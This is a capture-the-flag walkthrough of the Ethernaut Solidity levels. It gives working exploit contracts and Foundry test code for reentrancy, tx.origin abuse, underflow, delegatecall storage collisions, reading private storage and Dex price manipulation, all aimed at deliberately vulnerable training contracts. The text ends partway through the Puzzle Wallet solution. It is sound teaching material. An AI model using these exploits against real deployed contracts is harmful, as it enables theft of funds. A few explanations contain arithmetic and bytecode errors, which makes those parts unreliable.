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00 Hello

Solution 1

Just read the factory contract

return address(new Instance('ethernaut0'));

And call the function

function testExploit1() public {
    // password can be observed from the factory contract


Solution 2

Now, if we don't have the factory file at hand, which contains the password, we could read from the blockchain the Hello contract creation transaction and extract the string. Alternatively, we can just read the Hello contract storage at the slot 0, obtaining the value.

To simplify things (we can always check the lowest bit), assume we know beforehand the string is at most 31 bytes long. Since the first slot (0) is giving us the value 0x65746865726e6175743000000000000000000000000000000000000000000014, we can conclude the string is length 10 bytes (0x14 = 20 = 2 * 20 bytes), and the string is 0x65746865726e61757430. Take it to CyberChef to verify is ethernaut0:'Auto')&input=MHg2NTc0Njg2NTcyNmU2MTc1NzQzMA

Then we know we have to read the first 10 bytes from the slot 0 and convert it to a string in order to use it as a variable.

// alternate solution: you can't read the factory.
// you can always read the blockchain though
function testExploit() public {

  // get the contents of the slot 0 from the challenge address,
  // assuming that this is a string with less than 32 bytes,
  // in that case, length the lowest-order byte stores the value length * 2.
  bytes32 slot0 = vm.load(challengeAddress, bytes32(uint256(0)));
  uint8 len = uint8(slot0[31]) / 2;

  bytes memory password = new bytes(len);

  for (uint8 i = 0; i < len; i++) {
    password[i] = slot0[i];

  // test the found password in the contract



In particular: if the data is at most 31 bytes long, the elements are stored in the higher-order bytes (left aligned) and the lowest-order byte stores the value length * 2. For byte arrays that store data which is 32 or more bytes long, the main slot p stores length * 2 + 1 and the data is stored as usual in keccak256(p). This means that you can distinguish a short array from a long array by checking if the lowest bit is set: short (not set) and long (set).

01 Fallback

To beat this level, we need to comply with

instance.owner() == _player && address(instance).balance == 0;


Notice that the receive() function can make msg.sender the owner of the contract

receive() external payable {
  require(msg.value > 0 && contributions[msg.sender] > 0);
  owner = msg.sender;

Alas, we need to add some money to contributions:

function contribute() public payable {
  require(msg.value < 0.001 ether);
  contributions[msg.sender] += msg.value;
  if(contributions[msg.sender] > contributions[owner]) {
    owner = msg.sender;

So, to solve this level:

  • First, we call contribute() with one wei.
  • Then we call() the contract with another wei (msg.value > 0 control).
  • After that we are the owner of the contract and can withdraw() the funds.
  • Now, notice that in our test we are invoking the level from a contract (as opposed from an EOA), so we need to include a receive() function ourselves.
// make this true
// contributions[msg.sender] > 0
challenge.contribute{value: 1 wei}();
// trigger code in receive()
(bool success,) = address(challengeAddress).call{value: 1 wei}("");
// See the comment in receive() below
// we need a receive function, since we are receiving
// the funds here and this is not an EOA
receive() external payable {}


A review on receive() and fallback() functions

           send Ether
               | is empty?
              / \
            yes  no
            /     \
receive() exists?  fallback()
         /   \
        yes   no
        /      \
    receive()   fallback()

Review, why is not recommended to use the transfer() function

The transfer() function in Solidity is used to send ether (the cryptocurrency used on the Ethereum network) from one address to another. This function was originally introduced as a simple way to transfer ether and was widely used in smart contracts.

However, the transfer() function has a limitation that can cause problems in some situations. The function limits the amount of gas used to send the transaction to 2300 gas. If the receiving contract requires more than 2300 gas to process the transaction, the transfer will fail and the ether will be returned to the sender.

This can lead to unexpected behavior and security issues, as it can allow attackers to cause denial-of-service attacks by creating contracts that require more than 2300 gas to process a transfer. For this reason, the use of transfer() is no longer recommended for sending large amounts of ether or for interacting with complex contracts.

Instead, the recommended approach is to use the send() or call() functions, which allow for more fine-grained control over the gas limit and provide more robust error handling. Additionally, newer Solidity versions have introduced the payable modifier for functions, which makes it easier to handle incoming ether payments.

Other links for further reading

01 Fallout

To beat this level, we need to comply with

instance.owner() == _player;


We see that the only code where the owner is assigned is

/* constructor */
function Fal1out() public payable {
  owner = msg.sender;
  allocations[owner] = msg.value;

Some thoughts here, first from the 0.8.18 solidity documentation

Prior to version 0.4.22, constructors were defined as functions with the same name as the contract. This syntax was deprecated and is not allowed anymore in version 0.5.0.

That means that the constructor function has to be named constructor().

Also, notice that the name of the function is Fal1out, which differs in the 4th character with the name of the contract Fallout.

So, we can just assign owner by just invoking the function.



03 CoinFlip

To beat this level, we need to comply with

instance.consecutiveWins() >= 10;

That is, we need to win the game 10 or more times.


First of all, there is a control that prevents you to do all the coin guesses in the same block

if (lastHash == blockValue) {

lastHash = blockValue;

Now, the game works by taking the blockhash, divide it by a FACTOR (which is 2**255) and compare it with one. As the blockhash space is [0, 2**256 - 1], there is a 50% chance of getting a 0 or a 1.

uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false;

All we have to do, then, is performing the calculation ourselves to guess the right value.

Notice that we need to move to the next block on each iteration. To that end, we leverage the forge cheatcode vm.roll().

function attack(Vm vm) public {
  // we need to be right 10 times in order to beat the level.
  for (uint i = 0; i < 10; i++) {
    // compute our "guess" in advance.
    blockValue = uint256(blockhash(block.number - 1));
    coinFlip = blockValue / FACTOR;
    side = coinFlip == 1 ? true : false;

    // we flip and give our "guess".

    // let's move to the next block.
    vm.roll(block.number + 1);


04 Telephone

To beat this level, we need to comply with

instance.owner() == _player;


From the solidity documentation

  • msg.sender (address): sender of the message (current call)
  • tx.origin (address): sender of the transaction (full call chain)

We write this attack contract that does the actual call to the level

contract TelephoneAttack {
  ITelephone internal challenge;

  constructor(address _challengeAddress) {
    challenge = ITelephone(_challengeAddress);

  function attack() public {

As the function changeOwner() in the level is

function changeOwner(address _owner) public {
  if (tx.origin != msg.sender) {
    owner = _owner;

This means that the contract (or EOA) that calls attack() will get the ownership of the contract _owner parameter, provided we comply with tx.origin != msg.sender. This condition is true as this is the call chain:

tx.origin  ->                                msg.sender below         ->                                  ;

(Test EOA) -> TelephoneTest.testExploit() -> TelephoneAttack.attack() -> challenge.changeOwner(msg.sender);

In this case tx.origin would be the EOA, msg.sender inside the changeOwner() function is the address of the TelephoneAttack contract, and the _owner is the TelephoneTest contract.

The check at the factory will work as it is perform by the test contract.


05 Token

To beat this level, we need to comply with

token.balanceOf(_player) > playerSupply;


Notice the control at the transfer() function

require(balances[msg.sender] - _value >= 0);

If we use the value 2**256 - 1, then the difference will underflow, bypassing the condition:

challenge.transfer(msg.sender, 2**256 - 1);


06 Delegation

To beat this level, we need to comply with

parity.owner() == _player;


So Delegation.fallback() uses delegatecall().

From the solidity documentation:

There exists a special variant of a message call, named delegatecall which is identical to a message call apart from the fact that the code at the target address is executed in the context (i.e. at the address) of the calling contract and msg.sender and msg.value do not change their values.

The function delegatecall() allows us to use code akin to using libraries in other languages.

Them, what happens here? If we manage to arrive to the fallback() function of Delegation:

fallback() external {
  (bool result,) = address(delegate).delegatecall(;
  if (result) {

Making sure that contains the value abi.encodeWithSignature("pwn()")...

... The function Delegate.pwn() will be executed:

function pwn() public {
  owner = msg.sender;

Now, since this is a delegate call:

  1. msg.sender will not be the address of Delegation, but the address of its caller, as the context of the calling contract does not change its value.

  2. the owner variable in Delegate points to the slot 0 of the Delegate contract, this is relevant, we can see that the slot o of the Delegation contract is also its owner variable. Then the code owner = msg.sender; will change ownership in Delegation.

The solution then is just

(bool success,) ="pwn()"));


07 Force

To beat this level, we need to comply with

address(instance).balance > 0


Right. This is the contract, BTW.

contract Force {/*

                   MEOW ?
         /\_/\   /
    ____/ o o \
  /~____  =ø= /


Without a receive() function, looks like we are in trouble.

Enter selfdestruct():

The only way to remove code from the blockchain is when a contract at that address performs the selfdestruct operation. The remaining Ether stored at that address is sent to a designated target and then the storage and code is removed from the state. Removing the contract in theory sounds like a good idea, but it is potentially dangerous, as if someone sends Ether to removed contracts, the Ether is forever lost.

So, what we want to do is creating some contract with value on it, and selfdestructit, making sure we give this level address as the destination of whatever funds it holds.

contract ForceAttack {
  function byebye(address payable _dest) public {

  receive() external payable {}


Then we create the first contract, giving it 1 wei.

(bool success,) = address(attackerContract).call{value: 1 wei}("");

And invoke the attack at ForceAttack.byebye()



08 Vault

To beat this level, we need to comply with



The vault unlocks when the locked variable is false.

In theory one has to know its password (which is a private variable in the contract) to beat the level...

bytes32 private password;
function unlock(bytes32 _password) public {
  if (password == _password) {
    locked = false;

... But blockchain data is public! Being password the second variable in the Vault contract, it is assigned to the slot 1. Then. to beat this level, we just read the slot to get the password, and use it to unlock the vault.

// as reading another's contract storage
// is not supported by solidity (i.e. It needs a forge "cheatcode"),
// imagine this attack being made from a forge script
bytes32 password = vm.load(challengeAddress, bytes32(uint256(1)));

// too lazy to write code for an interface? Just do the call
(bool success,) ="unlock(bytes32)", password));


09 King

To beat this level, we need to comply with

instance._king() != address(this)

i.e. Take away the factory's kingship of the contract.


First, let's take a look at this receive() function

receive() external payable {
  require(msg.value >= prize || msg.sender == owner);
  king = msg.sender;
  prize = msg.value;

The player can be king if they send more ETH than the current prize, BUT, the owner can be king anytime their want, and they exercise that right just before checking the level conditions:

(bool result,) = address(instance).call{value:0}("");

Also, and this is important, if the claimant passes the control of the first line, they have to transfer what they sent to the incumbent king.

So, to beat this level, just send a msg.value of ETH greater than the current price, and prevent any future claimant to fully execute the receive() function by not being able to receive the incumbent king's prize.

contract KingAttacker {
  // ... SNIP

  function attack() external {
    // will be able to be king, as msg.value = prize
    // as the owner contract do have a receive() function,
    // they will be able to get their price.
    (bool result,) ={value: 0.001 ether}("");

  // this contract does not have a receive function,
  // preventing the owner of the contract to take over kingship back.


10 Reenstrance

To beat this level, we need to comply with

address(instance).balance == 0


Look at the guard of the withdraw() function

function withdraw(uint _amount) public {
  if(balances[msg.sender] >= _amount) {
    (bool result,) ={value:_amount}("");
    if(result) {
    balances[msg.sender] -= _amount;

The guard will let us pass if balances[msg.sender] >= _amount, and then the function will call msg.sender, giving it the amount requested, balance will be updated.

In a reentrancy attack, we craft a receive() function such that we call the very withdraw() function again. That is

  -> Reentrance.withdraw()
    -> receive()
      -> Reentrance.withdraw()
        -> receive()
          -> (and so on)

This flow will keep working, as the guard balances[msg.sender] >= _amount is true, draining the smart contract in the process.

An example on how the attack could be written is

function attack() external {
  // first donate something to be able to pass the guard,
  // that is balances[msg.sender] >= _amount
  target.donate{value: 0.001 ether}(address(this));

  // then trigger the withdraw function
  // the latter will call receive() below.
  target.withdraw(0.001 ether);

receive() external payable {
  uint targetBalance = address(target).balance;

  // this can be a clean way to drain the contract.
  // you can also just set target.withdraw() and
  // re-enter until it reverts.
  if (targetBalance >= 0.001 ether) {
    target.withdraw(0.001 ether);


11 Elevator

To beat this level, we need to comply with;


The Elevator contract has a boolean top variable, which initializes to false.

The top variable is manipulated at the goTo() function, which uses Building.isLastFloor. Notice that Building is an interface, so we have to implement our own contract, also that as Building building = Building(msg.sender); in the goTo() function, we have to call the latter from this contract.

The logic of the elevator has some points of interest

if (! building.isLastFloor(_floor)) {
  floor = _floor;
  top = building.isLastFloor(floor);
  • If isLastFloor evaluates to true, we cannot enter the code block, meaning that we cannot get to modify top.
  • If isLastFloor evaluates to false, then we enter the code block, but top becomes false.

So, to beat this level, we want to write isLastFloor such that the first time is called, it returns false, then it returns true.

bool flag;

// this function needs to answers false the first time,
// and then true the second one.
function isLastFloor(uint256) external returns (bool) {
  if (flag) {
    return true;
  } else {
    flag = true;
    return false;


12 Privacy

To beat this level, we need to comply with

instance.locked() == false;


When the level is created, some data is added:

data[0] = keccak256(abi.encodePacked(tx.origin,"0"));
data[1] = keccak256(abi.encodePacked(tx.origin,"1"));
data[2] = keccak256(abi.encodePacked(tx.origin,"2"));
Privacy instance = new Privacy(data);

To unlock the level, we must know the value of data[2].

function unlock(bytes16 _key) public {
  require(_key == bytes16(data[2]));
  locked = false;

Recall that the blockchain is public, see the solution of 08 Vault, we just use the cheat code vm.load(), which wouldn't work on-chain, but would surely work within a forge script in a real world situation.

So far so good, but we want to know which slot to look at! See the contract

bool public locked = true;
uint256 public ID = block.timestamp;
uint8 private flattening = 10;
uint8 private denomination = 255;
uint16 private awkwardness = uint16(block.timestamp);
bytes32[3] private data;

A naive printing of all the slots give us


We can see that the variables are stored in an optimized way, with,

  • slot 0: bool public locked.
  • slot 1: uint256 public ID. The reason there are so maby zeroes is the assigning of block.timestamp.
  • slot 2: uint16 private awkwardness, uint8 private denomination , uint8 private flattening. Pay attention at the order they are stored.
  • slot 3: bytes32[3] private data, element 0
  • slot 4: bytes32[3] private data, element 1
  • slot 5: bytes32[3] private data, element 2

Since unlock() needs data[2], we are looking at the slot 5:

// variables of this data array are at slots 3, 4, and 5
bytes16 key = bytes16(vm.load(challengeAddress, bytes32(uint256(5))));


13 Gatekeeper One

To beat this level, we need to comply with

instance.entrant() == _player;


  • gateOne()
require(msg.sender != tx.origin);

is passed through by using a proxy contract

  • gateTwo()
require(gasleft() % 8191 == 0);

just brute force it, these tests are running in a fork

  • gateThree()
require(uint32(uint64(_gateKey)) == uint16(uint64(_gateKey)), "GatekeeperOne: invalid gateThree part one");
require(uint32(uint64(_gateKey)) != uint64(_gateKey), "GatekeeperOne: invalid gateThree part two");
require(uint32(uint64(_gateKey)) == uint16(uint160(tx.origin)), "GatekeeperOne: invalid gateThree part three");

Use chisel or your favorite REPL to check the operations on 0x1122334455667788.

$ chisel

➜ _gateKey = 0x1122334455667788

➜ uint32(uint64(_gateKey))
Type: uint
├ Hex: 0x55667788

➜ uint16(uint64(_gateKey))
Type: uint
├ Hex: 0x7788

➜ uint64(_gateKey)
Type: uint
├ Hex: 0x1122334455667788

➜ uint16(uint160(0xabcd9a9e9aa1c9db991c7721a92d351db4fac990))
Type: uint
├ Hex: 0xc990
  • uint32(uint64(_gateKey)) == uint16(uint64(_gateKey))

    • can be true with 0x1122334400007788.
  • uint32(uint64(_gateKey)) != uint64(_gateKey)

    • needs both to be different, which is true
  • uint32(uint64(_gateKey)) == uint16(uint160(tx.origin))

    • make 7788 equal to the last hex digits of tx.origin
    • ex: 0x1122334400007788 => 0x112233440000ea72
    • in fact, it can be 0x100000000000ea72,
    • which makes it straighforward to get analytically.

Putting all the elements together:

  Proxy proxy = new Proxy(challengeAddress);
  bytes8 key = bytes8(uint16(uint160(tx.origin)) + 0x1000000000000000);

  // this loop is to brute-force the gateTwo
  for (uint i = 27000; i > 0; i--) {
    if (proxy.enter{gas: i}(key)) {
      require(challengeFactory.validateInstance(payable(challengeAddress), tx.origin));


14 Gatekepper Two

To beat this level, we need to comply with

instance.entrant() == _player;


  • gateOne()
require(msg.sender != tx.origin);

is passed through by using a proxy contract

  • gateTwo()
uint x;
assembly { x := extcodesize(caller()) }
require(x == 0);

extcodesize(caller()) retrieves the size of the call sender contract. See Yul EVM dialect.

As the Ethereum Yellow Paper

7.1. Subtleties. Note that while the initialisation code is executing, the newly created address exists but with no intrinsic body code.

and the foot note in that page

During initialization code execution, EXTCODESIZE on the address should return zero, which is the length of the code of the account while CODESIZE should return the length of the initialization code (as defined in H.2).

Meaning that extcodesize(caller()) will return 0 during the creation of the contract. In other words, we need to introduce our attack at the constructor of the contract we are using to attack the level.

  • gateThree()
require(uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == type(uint64).max);

This requires some algebra

//   if Constant ^ key = 0xff
//   then key = 0xff ^ constant
//   notice that they are checking against msg.sender,
//   so compute the key at the proxy

The code to produce the key would be

bytes8 key = bytes8(keccak256(abi.encodePacked(address(this)))) ^ 0xffffffffffffffff;

where the Constant above is bytes8(keccak256(abi.encodePacked(address(this)))).

Putting everything together, then, we create an attack contract

contract Proxy {
  constructor(address _challengeAddress) {
    IGatekeeperTwo challenge = IGatekeeperTwo(_challengeAddress);
    bytes8 key = bytes8(keccak256(abi.encodePacked(address(this)))) ^ 0xffffffffffffffff;


And we call it like this

// attack being performed at the construction of the contract
Proxy proxy = new Proxy(challengeAddress);


15 Naught Coin

To beat this level, we need to comply with

instance.balanceOf(_player) == 0;


We see the writer of the NaughtCoin contract inherits from ERC20 and overrides the transfer() function

function transfer(address _to, uint256 _value) override public lockTokens returns(bool) {
  super.transfer(_to, _value);

Now, the ERC20 interface have other functions, namely transferFrom(), which has not been overriden, therefore we can avoid the lockTokens modifier

uint256 balance = nc.balanceOf(address(this));

nc.approve(address(this), balance);
nc.transferFrom(address(this), tx.origin, balance);


16 Preservation

To beat this level, we need to comply with

preservation.owner() == _player;


Look at the function setFirstTime().

function setFirstTime(uint _timeStamp) public {
  timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));

What it does is leveraging the library in the address stored at the variable timeZone1Library, and execute the call specified by the variables setTimeSignature and _timeStamp.

The contract is initialized and timeZone1Library points at this contract

// Simple library contract to set the time
contract LibraryContract {

  // stores a timestamp
  uint storedTime;

  function setTime(uint _time) public {
    storedTime = _time;

And setTimeSignature is bytes4 constant setTimeSignature = bytes4(keccak256("setTime(uint256)"));

What it happens then is, that we invoke setFirstTime, as timeZone1Library is an instance of LibraryContract, what it will do is modify the first variable, or slot 0.

To solve this level, when we invoke setFirstTime, we will give it an instance of a contract we craft, such that it will call setTime and modify the third slot, as opposed to the first one. This is where the owner variable is in the original contract.

Our attacking contract can be like this

contract PreservationAttack {
  bytes32 internal slot0;
  bytes32 internal slot1;
  bytes32 internal owner; // slot3
  address internal challengeAddress; // needed by us

  constructor(address _challengeAddress) {
    challengeAddress = _challengeAddress;

  function setTime(uint256 _input) public {
    owner = bytes32(_input);

Then the actual attack is

// switch timeZone1Library with our contract
data = uint256(uint160(address(attackContract)));

(success,) ="setFirstTime(uint256)", data));

// invoke again, this time we'll go through our PreservationAttack contract
data = uint256(uint160(address(address(this))));
(success,) ="setFirstTime(uint256)", data));


17 Recovery

To beat this level, we need to comply with

address(lostAddress[_instance]).balance == 0;


We see that lostAddress[_instance] was assigned at the factory with the value address(uint160(uint256(keccak256(abi.encodePacked(uint8(0xd6), uint8(0x94), recoveryInstance, uint8(0x01)))))). What is this?

Address of a created contract

Looking at the Yellow Paper, "Contract Creation":

The address of the new account is defined as being the rightmost 160 bits of the Keccak-256 hash of the RLP encoding of the structure containing only the sender and the account nonce.

That is, in solidity language

address(uint160(uint256(keccak256(abi.encodePacked(uint8(0xd6), uint8(0x94), senderAddress, nonce)))))

Recursive Lenght Prefix (RLP) applied

The 0xd6 and 0x94 are part of RLP:

  • As the senderAddress contains 20 bytes 0x14, then it will have a prefix of 0x80 (string between 0-55 bytes) + 0x14 (length of the string) = 0x94.
  • As this senderAddress goes in a structure with the nonce (only one byte), we have 1 byte of the RLP prefix of senderAddress.
  • The 20 bytes of senderAddress, and the 1 byte of none. That is 1 + 20 + 1 = 22 bytes 0x16.
    • The prefix of this list is 0xc0 (list of 0-55 bytes) + 0x16 = 0xd6.

Back to the problem

This means that the factory assigned to lostAddress[address(recoveryInstance)] the address of the created instance of SimpleToken. As the factory is giving us the address of the instance of Recovery, we can compute ourselves this address.

Now, notice that SimpleToken has this function

// clean up after ourselves
function destroy(address payable _to) public {

Since the problem asks us to make the balance of this instance 0, we can beat the level by just invoking this function.

Putting all together

function testExploit() public {
  address lostAddress = address(
            uint8(0xd6), uint8(0x94), challengeAddress, uint8(0x01))))));

  (bool success,) ="destroy(address)", address(this)));


18 Magic Number

To beat this level, we need to comply with

// Retrieve the instance.
MagicNum instance = MagicNum(_instance);

// Retrieve the solver from the instance.
Solver solver = Solver(instance.solver());

// Query the solver for the magic number.
bytes32 magic = solver.whatIsTheMeaningOfLife();
if(magic != 0x000000000000000000000000000000000000000000000000000000000000002a) return false;

// Require the solver to have at most 10 opcodes.
uint256 size;
assembly {
  size := extcodesize(solver)
if(size > 10) return false;

In other words, create a contract with 10 opcodes, able to return to you the number 42.


Crafting opcodes is an art. Here is an excellent writeup explaining what to do to beat this level. We will try and summarize the steps in here.

What happens during contract creation

  1. First, a user or contract sends a transaction to the Ethereum network.
  2. During contract creation, the EVM only executes the initialization code.
  3. After this initialization code is run, only the runtime code remains on the stack.
  4. Finally, the EVM stores this returned, surplus code in the state storage, in association with the new contract address.

To beat this level, two sets of codes are needed: Initialization opcodes, and Runtime opcodes.

Runtime opcodes

You want the contract to return 0x42, regardless of what function is called.

Before you can return a value, first you have to store it in memory.

We arbitrarily choose the memory position 0x80

602a    // v: push1 0x2a (value is 0x2a)
6080    // p: push1 0x80 (memory slot is 0x80)
52      // mstore

6020    // s: push1 0x20 (value is 32 bytes in size)
6080    // p: push1 0x80 (value was stored in slot 0x80)
f3      // return

The resulting runtime opcodes are 602a60805260206080f3: Ten bytes.

Now we want to add the constructor() code, also called Initialization opcodes.

Initialization opcodes

codecopy needs three arguments: s, f, and t. s is 10 bytes (see above), To know f, we need to know how many bytes we are using at this initialization, and we choose t arbitrarily to be at 0x00.

Then, we return the in-memory runtime opcodes to the EVM.

600a    // s: push1 0x0a (10 bytes)
60??    // f: push1 0x?? (current position of runtime opcodes)
6000    // t: push1 0x00 (destination memory index 0)
39      // CODECOPY

600a    // s: push1 0x0a (runtime opcode length)
6000    // p: push1 0x00 (access memory index 0)
f3      // return to EVM

As this routine uses 12 bytes, we replace ?? by 0x0c. So we have 600a600c600039600a6000f3.

The byte sequence then is 0x600a600c600039600a6000f3602a60805260206080f3

Putting everything together

Use some assembly here to create the contract

bytes memory bytecode = hex"600a600c600039600a6000f3602a60005260206000f3";
bytes32 salt = 0;
address solverAddress;

assembly {
    solverAddress := create2(0, add(bytecode, 0x20), mload(bytecode), salt)

Invoke the function afterwards to set the contract



19 Alien Codex

To beat this level, we need to comply with

instance.owner() ==_player


Ownable contracts

An Ownable contract has as first variable address private _owner, which is the slot 0. Can we modify it?

Notice that the contract has a variable bool public contact, and another bytes32[] public codex. Since owner is an address, it will share the slot 0 with contact, then the slot 1 corresponds tocodex.

Array storage

Assume the storage location of the mapping or array ends up being a slot p after applying the storage layout rules. For dynamic arrays, this slot stores the number of elements in the array.

Array data is located starting at keccak256(p) and it is laid out in the same way as statically-sized array data would: One element after the other, potentially sharing storage slots if the elements are not longer than 16 bytes.

Then, slot 1 will store the length of codex, with slot keccak(1) its first element, slot keccak(1) + 1 its second, and so on.

Writing the owner variable

Look at the function revise()

function revise(uint i, bytes32 _content) contacted public {
  codex[i] = _content;

As an element i in the codex array is stored at keccak(1) + i, one would say "Why I don't just offset from keccak256(1) until reaching the slot 0?". We cannot, as the EVM will check for the length of the array stored at slot 1.

But, there is this retract() function in the contract

function retract() contacted public {

This function can be invoked, and will underflow the variable at slot 1, tricking the EVM into believing that the array has MAX_UINT256 elements. From there we can point to any slot we want.

Setting the offset

We need to determine the offset then, let's solve the equation

0x00 = offset + keccak256(1)                // reorganize
offset = 0x00 - keccak256(1)                // But 0x00 =  MAX_UINT256 + 1
offset = MAX_UINT256 + 1 - keccak256(1)     // But MAX_UINT256 - x = MAX_UINT256 ^ x
offset = ( MAX_UINT256 ^ keccak256(1) ) + 1

Putting all together

// all the other functions have a modifier
// requiring you to invoke this one first

// this function will underflow the length of the dynamic array at slot1 to 0xff...ff
// meaning that now the EVM thinks that we have 2**256 - 1 elements there.
// this way we don't revert on an out of bonds condition.

// now we need our trick to write into slot0 (0x00...00)

// - here is where the first element of codex should be stored
bytes32 firstElementSlot = keccak256(abi.encodePacked(uint(1)));

// 0x00 = offset + keccak256(1)                // reorganize
// offset = 0x00 - keccak256(1)                // But 0x00 =  MAX_UINT256 + 1
// offset = MAX_UINT256 + 1 - keccak256(1)     // But MAX_UINT256 - x = MAX_UINT256 ^ x
// offset = ( MAX_UINT256 ^ keccak256(1) ) + 1
uint256 offset = uint256(bytes32(MAX_UINT256) ^ firstElementSlot) + 1;

// write!
challenge.revise(offset, bytes32(uint256(uint160(address(this)))));


20 Denial

To beat this level, we need to comply with

if (address(instance).balance <= 100 wei) { // cheating otherwise
    return false;

// fix the gas limit for this call
(bool result,) = address(instance).call{gas:1000000}(abi.encodeWithSignature("withdraw()")); // Must revert
return !result;

In other words, we got to prevent the instance to have their funds withdrawn by making the function revert, but we can't just empty the level contract.

Solution 1 - Infinite Loop

An infinite loop will just consume all the gas, reverting the transaction.

// infinite loop
// "EvmError: OutOfGas"
while (true) {}

Solution 2 - Reentrancy Attack

When your attacking contract receives payment, call withdraw() again

// reentrancy attack
// "EvmError: OutOfGas"

Solution 3 - Invalid Opcode

Just issue an invalid opcode to revert

// invalid opcode
// "EvmError: InvalidOpcode"
assembly { invalid() }

Solution 4 - OOG with assert(false)

assert(false) will consume all the remaining gas in the transaction.

For some reason is not working in Solidity 0.8.18, though. See here for some insights/

// consume all the gas with an assert(false)
// for some reason is not working in solidity > 0.8.5
//   see this link


21 Shop

To beat this level, we need to comply with

_shop.price() < 100


There's a buy() function

function buy() public {
  Buyer _buyer = Buyer(msg.sender);

  if (_buyer.price() >= price && !isSold) {
    isSold = true;
    price = _buyer.price();

We need to provide the Buyer contract from the given interface

interface Buyer {
  function price() external view returns (uint);

The difficulty we find is that they function price() that we have to provide is a view. As such, we cannot just add a boolean that we modify at the second visit, like in the Elevator level.

Now, the Shop contract has two variables

contract Shop {
  uint public price = 100;
  bool public isSold;

  // ...

We can access the variable bool public isSold;, with isSold(). To avoid compiler problems, as price() is a view, we just compose an interface IShop

interface IShop {
  function buy() external;
  function isSold() external view returns (bool);

Afterward we just write our price() function to complete the attack

function price() public view returns (uint) {
  if (challenge.isSold()) {
    return 0;
  return 100;


22 Dex

To beat this level, we need to comply with

IERC20(token1).balanceOf(_instance) == 0 || ERC20(token2).balanceOf(_instance) == 0


The key in this problem is to understand this function

function getSwapPrice(address from, address to, uint amount) public view returns(uint){
  return((amount * IERC20(to).balanceOf(address(this)))/IERC20(from).balanceOf(address(this)));

Let's see some trades:

  • On t = 0

    • Player has 10 token_1, 10 token_2.
    • Dex has 100 token_1, 100 token_2.
  • On t = 1

    • Player wants to swap token_1 for token_2, sends 10 token_1 to dex.
    • Dex computes the price, it is 100 token_2 / 100 token_1 = 1.
    • Dex receives the 10 token_1, now it has 100 + 10 = 110 token_1.
    • Dex sends 10 * 1 = 10 token_2, now it has 100 - 10 = 90 token_2.
    • Player receives the 10 token_2, now it has 10 + 10 = 20 token_2.
  • On t = 2

    • Player wants to swap token_2 for token_1, sends 20 token_2 to dex.
    • Dex computes the price, it is 110 token_1 / 90 token_1 = 1.22.
    • Dex receives the 20 token_2, now it has 90 + 20 = 110 token_2.
    • Dex sends 20 * 1.22 = 24 token_1, now it has 110 - 24 = 86 token_1.
    • Player receives the 24 token_1, now it has 0 + 24 = 24 token_1.

We can see that if the player just keeps swapping, they will deplete the dex of all its tokens!

Then an attack could be

function attack(IDex dex) public {
  address from = dex.token1();
  address to = dex.token2();
  uint256 swapAmount;

  // keep swapping until we deplete either token in the dex
  while (dex.balanceOf(to,   address(dex)) != 0 &&
         dex.balanceOf(from, address(dex)) != 0) {

    // control to avoid the "Not enough to swap" error
    swapAmount = min(
      dex.balanceOf(from, address(this)),
      dex.balanceOf(from, address(dex))

    dex.swap(from, to, swapAmount);
    (from, to) = swapAddresses(from, to);

With min() and swapAddresses() convenience functions.


23 Dex Two

To beat this level, we need to comply with

IERC20(token1).balanceOf(_instance) == 0 && ERC20(token2).balanceOf(_instance) == 0


Looks very similar to the Dex level. Notice, however the absence of this control from the former challenge in the swap() function:

require((from == token1 && to == token2) || (from == token2 && to == token1), "Invalid tokens");

In other words, we could use tokens not set into the Dex to engage in swapping:

The design of the MyToken contract could be

contract MyToken {
  function transferFrom(address, address, uint256) public pure returns (bool) {
    // we don't even need to do anything here
    return false;

  function balanceOf(address) public pure returns(uint256) {
    // the dex will ask for IERC20(from).balanceOf(address(this))
    // we give them the value `1`
    // the dex uses it to compute the swap amount = amount * token_to / token_from
    return 1;

And the attack to be

function testExploit() public {
  // will get as token amount 1 * (100/ 1) = 100 on each swap
  dex.swap(address(myToken), dex.token1(), 1);
  dex.swap(address(myToken), dex.token2(), 1);


24 Puzzle Wallet

To beat this level, we need to comply with

proxy.admin() == _player


So PuzzleProxy is an instance of UpgradeableProxy. This means that we can give and upgrade an _implementation which is the layer where the logic is. Problem with proxies is which pattern we use to store data: The state is in the proxy, with the logic layer operating on the contaxt of this proxy. It is in essence a delegatecall. Then, if we are not careful, we can overwrite with our implementation the state in an undesirable way.

Proxies and Slots

Look at the state at the proxy

address public pendingAdmin;
address public admin;

This is, the slot 0 contains the variable pendingAdmin, and the slot 1 the variable admin.

While at the implementation

address public owner;
uint256 public maxBalance;
mapping(address => bool) public whitelisted;
mapping(address => uint256) public balances;

In here, all logic to owner will work with slot 0, and interactions with maxBalance with slot 1.

As the mission is to become admin. If we are able to leverage the code from the PuzzleWallet contract to modify maxBalance, we can beat the level.

How can we do this? With the following chain in reverse order

  • function setMaxBalance(uint256 _maxBalance) external onlyWhitelisted to make maxBalance the player's address.
    • Since it has a modifier onlyWhitelisted,
    • We add the address to the whitelist with function addToWhitelist(address addr) external.
      • Since it has a control require(msg.sender == owner, "Not the owner"),
      • We make the player owner by exploiting the storage overlap at function proposeNewAdmin(address _newAdmin) external

All nice and fancy. Now, the problem with setMaxBalance is the following control:

require(address(this).balance == 0, "Contract balance is not 0");

Which we are going to address in the next sub section.

Draining the Puzzle Wallet

Notice that execute() allows you to withdraw funds from the wallet.

function execute(address to, uint256 value, bytes calldata data) external payable onlyWhitelisted {
  require(balances[msg.sender] >= value, "Insufficient balance");
  balances[msg.sender] -= value;
  (bool success, ) ={ value: value }(data);
  require(success, "Execution failed");

Also there is a deposit() function

function deposit() external payable onlyWhitelisted {
  require(address(this).balance <= maxBalance, "Max balance reached");
  balances[msg.sender] += msg.value;

If deposit() is bundled twice into multicall(), it will in a way "reuse" msg.value in such a way that balances[msg.sender] will be a multiple of the actual sent value.

As the wallet was initialized at the factory with 0.001 ether, we could deposit 0.001 ether, but trick the wallet into recording that we have instead 0.002 ether. In this way we withdraw our funds and the wallet's, draining the wallet in the process.

If we look at multicall() we realize there is indeed a control for calling the deposit() function twice within it, but there is no control for the deposit() function inside a multicall() function. In other words we are looking to bundle the calls like this:

multicall_0 - deposit
            - multicall_1 - deposit

We compose the data in the following way

// let's craft the deposit call
bytes memory depositCalldata = abi.encodeWithSignature("deposit()");

// bundle deposit into into multicall_1
bytes[] memory multicall1Params = new bytes[](1);
